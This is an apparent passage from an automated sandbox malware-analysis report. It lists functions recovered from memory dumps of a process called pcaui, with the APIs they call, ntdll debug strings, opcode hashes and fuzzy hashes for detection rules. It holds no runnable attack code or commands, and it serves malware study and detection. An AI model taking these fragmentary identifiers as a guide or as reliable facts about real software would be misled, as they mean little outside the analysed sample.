                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                                                        • Instruction ID: 06ccf842434c05e39c59b8bd33c9b9aa1ff0c190aadc3742f5a48d9cf8220da0
                                                                                                                        • Opcode Fuzzy Hash: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                                                        • Instruction Fuzzy Hash: 1DE0487625030817E72465A89C45F6533589B48628F584551F91EDB7C1E678F9019550
                                                                                                                        Function 02D7498D Relevance: 1.5, APIs: 1, Instructions: 24libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D74932
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction ID: 1d54ba5b58068217cda63eb8473018ec511d7dcd906de0914acd8efb780dbe9e
                                                                                                                        • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction Fuzzy Hash: D3E01235A5414AAECF54CB94CC81F99B778EB45518F0483CAD928972D1E634EA068781
                                                                                                                        Function 02D7118B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 02D71197
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1836367815-0
                                                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                        • Instruction ID: 3ccf0fc053d19b33f3ac9d0f47266fd5e434f45272eac182bd6bb7f07028f863
                                                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                        • Instruction Fuzzy Hash: 9FD0A967B4000C3AAA024584ACC1DFEBB2CEB84AA6F004063FF08E6140E6218D060AB0
                                                                                                                        Function 02D784C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02D720A0,02D882AE,02D8596F,02D72066), ref: 02D784F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                                                        • Instruction ID: 574a41ba1450ba4bee492819e2bb651237dc48e45f5673a8541c4d42bdb2c2f4
                                                                                                                        • Opcode Fuzzy Hash: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                                                        • Instruction Fuzzy Hash: 91D05E723903043BE600E6E4CC06F26328DDB05798F098069B90DF7BC1EA65FA414A76
                                                                                                                        Function 05002C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1d31687615767bd267cab2633e2fbfe4fd9531861c8aa18a8569956914ff327c
                                                                                                                        • Instruction ID: 5229b256f124d7f2058ff031df82875209810361cedeb5bc051fb919e5a90ff1
                                                                                                                        • Opcode Fuzzy Hash: 1d31687615767bd267cab2633e2fbfe4fd9531861c8aa18a8569956914ff327c
                                                                                                                        • Instruction Fuzzy Hash: 05B09B729415C5C6FA51E760960CF1F79517BD1711F55C065D2030685F4738C1D1E276

                                                                                                                        Non-executed Functions

                                                                                                                        Function 053904E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                                                        • Instruction ID: 3e05f51be1c8c9fa5b8e6b3f2bf5b7ecf7f16f12566ab35852cadba1c27010a6
                                                                                                                        • Opcode Fuzzy Hash: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                                                        • Instruction Fuzzy Hash: C141E7B161CB0D8FDB6CEF699085677B3E2FB85300F50052DD98AC3252EBB4E8468785
                                                                                                                        Function 0539DF69 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                        • API String ID: 0-3558027158
                                                                                                                        • Opcode ID: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                                                        • Instruction ID: 63c681cd2b7fb3020b83b6d4e7794f455120e5f9940c2597ac15e18a7c1c5fb8
                                                                                                                        • Opcode Fuzzy Hash: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                                                        • Instruction Fuzzy Hash: 3F9160F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                                        Function 05002890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 3cd3d6b49aadb47895412e6729f9ca8efdf4c7e64f2ca279d2d545be18d1e97c
                                                                                                                        • Instruction ID: d2d5f634814da50058be9816cdb4008c61f75f0f2744912db03ff1578c14fc95
                                                                                                                        • Opcode Fuzzy Hash: 3cd3d6b49aadb47895412e6729f9ca8efdf4c7e64f2ca279d2d545be18d1e97c
                                                                                                                        • Instruction Fuzzy Hash: EE51E9BAB04117BFDF11DBA8D89497EF7F9BB09200B509269E495D7681D334DE408BE0
                                                                                                                        Function 05072410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: fbf6bb772298cf0becb110154c595c197d137d61f8db30fc59fbd78621f837bd
                                                                                                                        • Instruction ID: 5284e9fcd33cf0be042425db2a7ceaf10e59e0aae424574540acc4394a2232ef
                                                                                                                        • Opcode Fuzzy Hash: fbf6bb772298cf0becb110154c595c197d137d61f8db30fc59fbd78621f837bd
                                                                                                                        • Instruction Fuzzy Hash: 1A510379F0064AAFCB30DE9CD8909BFB7FAFB44200B048459E8D6D3641E774EA408B64
                                                                                                                        Function 04FF7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05034655
                                                                                                                        • ExecuteOptions, xrefs: 050346A0
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 05034787
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05034742
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050346FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05034725
                                                                                                                        • Execute=1, xrefs: 05034713
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: b98a234c31be481c3cc471cca4819e57ac0021764a343af5fc451f10fd9e19f9
                                                                                                                        • Instruction ID: 120b18654042bd803d9c43f364fe0e4a1524ef605f72d7de6a1a4497cb05c4f5
                                                                                                                        • Opcode Fuzzy Hash: b98a234c31be481c3cc471cca4819e57ac0021764a343af5fc451f10fd9e19f9
                                                                                                                        • Instruction Fuzzy Hash: 9651CB71B002196BEF10BF64ED89FEDB7E8AF14704F1400A9D605A71A0EB71BA56CF54
                                                                                                                        Function 05096940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: c6288662990fcfc7c936cff83c85cd0c0294892787ccec33ae82d91edc33f36a
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: 06021471608341AFDB49CF18D494A6EBBE5FFC8700F14892DF9954B268DB32E905DB82
                                                                                                                        Function 0500B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 6eae13af6e311f5717acc1f0f8845e141dcde98980aab7be4ee166ba9a3f6c01
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: F281D330E092499EFF68CE68E9507FEBBF2BF45310F186559D8A6A72D0C7348941CB51
                                                                                                                        Function 050720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: 02674f1c41d1517b54048a1df722bc4b212f521d31c131aa425b1e3977191671
                                                                                                                        • Instruction ID: 82e4e106cacf83bfdaa5d576ab72ab1824521a99329a55c9599faf68e9a6b084
                                                                                                                        • Opcode Fuzzy Hash: 02674f1c41d1517b54048a1df722bc4b212f521d31c131aa425b1e3977191671
                                                                                                                        • Instruction Fuzzy Hash: 6E21717AE0015EABDB10DE79EC54AFE77E9BF64640F080116ED45D3240EB30EA418BA5
                                                                                                                        Function 04FEF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 0503031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050302E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050302BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 61aa6bf9d2bb12bd15e6e42e3da03414e318acc3db24562c71e01a203c7f9dbe
                                                                                                                        • Instruction ID: f679e80a06b7318543ca21b943e3fcb978e524f0402722319452220167803fa0
                                                                                                                        • Opcode Fuzzy Hash: 61aa6bf9d2bb12bd15e6e42e3da03414e318acc3db24562c71e01a203c7f9dbe
                                                                                                                        • Instruction Fuzzy Hash: 4AE10F31608741EFD720CF29D899B6AB7E5BF88314F140A2DF4A58B2D0D774E842CB52
                                                                                                                        Function 04FFBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 05037B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 05037BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05037B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 263edf549e817dfe5b27d9a25bd8a747ebb51fdaf7daf5029a56b2a1dd8b2a58
                                                                                                                        • Instruction ID: 7d8c2e0410511ab26c519cdc9724987e90d7ebc1a52990073c44db8f5fe7a6c1
                                                                                                                        • Opcode Fuzzy Hash: 263edf549e817dfe5b27d9a25bd8a747ebb51fdaf7daf5029a56b2a1dd8b2a58
                                                                                                                        • Instruction Fuzzy Hash: E141F1757047028FD720DE25DC41B6AB7E5EF88720F000A2DE95A9B290EB70F9068B91
                                                                                                                        Function 04FFB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0503728C
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 050372A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 050372C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05037294
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: 6260024e10a3fdfa97f0e3980b4362af7fe7916b767823301690f648f679fe63
                                                                                                                        • Instruction ID: 96b7c4febdfac047f40ce09749233bab499c5690a2162e1ecb2516b71109dca1
                                                                                                                        • Opcode Fuzzy Hash: 6260024e10a3fdfa97f0e3980b4362af7fe7916b767823301690f648f679fe63
                                                                                                                        • Instruction Fuzzy Hash: 774103B2704202ABD721DE25DD42FAEB7E5FF54710F140619FA55AB240EB21F912CBD1
                                                                                                                        Function 05072300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: 706f7817a7465c78e6a9c278b6cac21d4a8a714db61e8141ec8d35ec1d14ef4d
                                                                                                                        • Instruction ID: ac98a4b58fc561575fc8bd6f1d60d8578fc6786b869461bb564498eddfd4a4ff
                                                                                                                        • Opcode Fuzzy Hash: 706f7817a7465c78e6a9c278b6cac21d4a8a714db61e8141ec8d35ec1d14ef4d
                                                                                                                        • Instruction Fuzzy Hash: 53318276E0021D9FDB60DE29EC44BEEB7F8FB44610F454556E849E3240EB30EA458BA5
                                                                                                                        Function 05007D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 97ff8b160d43262c8510914f55aae45096dcb2de8a067fbb05fc5e00d64ed27c
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: F0919470E042159BFF64DE69E881ABFB7F6FF44320F14A51AE855E72C0D738A9428750
                                                                                                                        Function 04FC9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: a5a330ed5e91f4bf5e471756ff1fd6a476cc2ac7845084b2cbfe57337a299dd2
                                                                                                                        • Instruction ID: bf46b7c4c9741d0761ea07dd9194a5873133be76910c56f92200edcd12d2b75c
                                                                                                                        • Opcode Fuzzy Hash: a5a330ed5e91f4bf5e471756ff1fd6a476cc2ac7845084b2cbfe57337a299dd2
                                                                                                                        • Instruction Fuzzy Hash: 9A812DB6D002799BDB35CF94CD45BEEB7B5AB08714F0441DAA909B7240D7706E85CFA0
                                                                                                                        Function 0504CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0504CFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
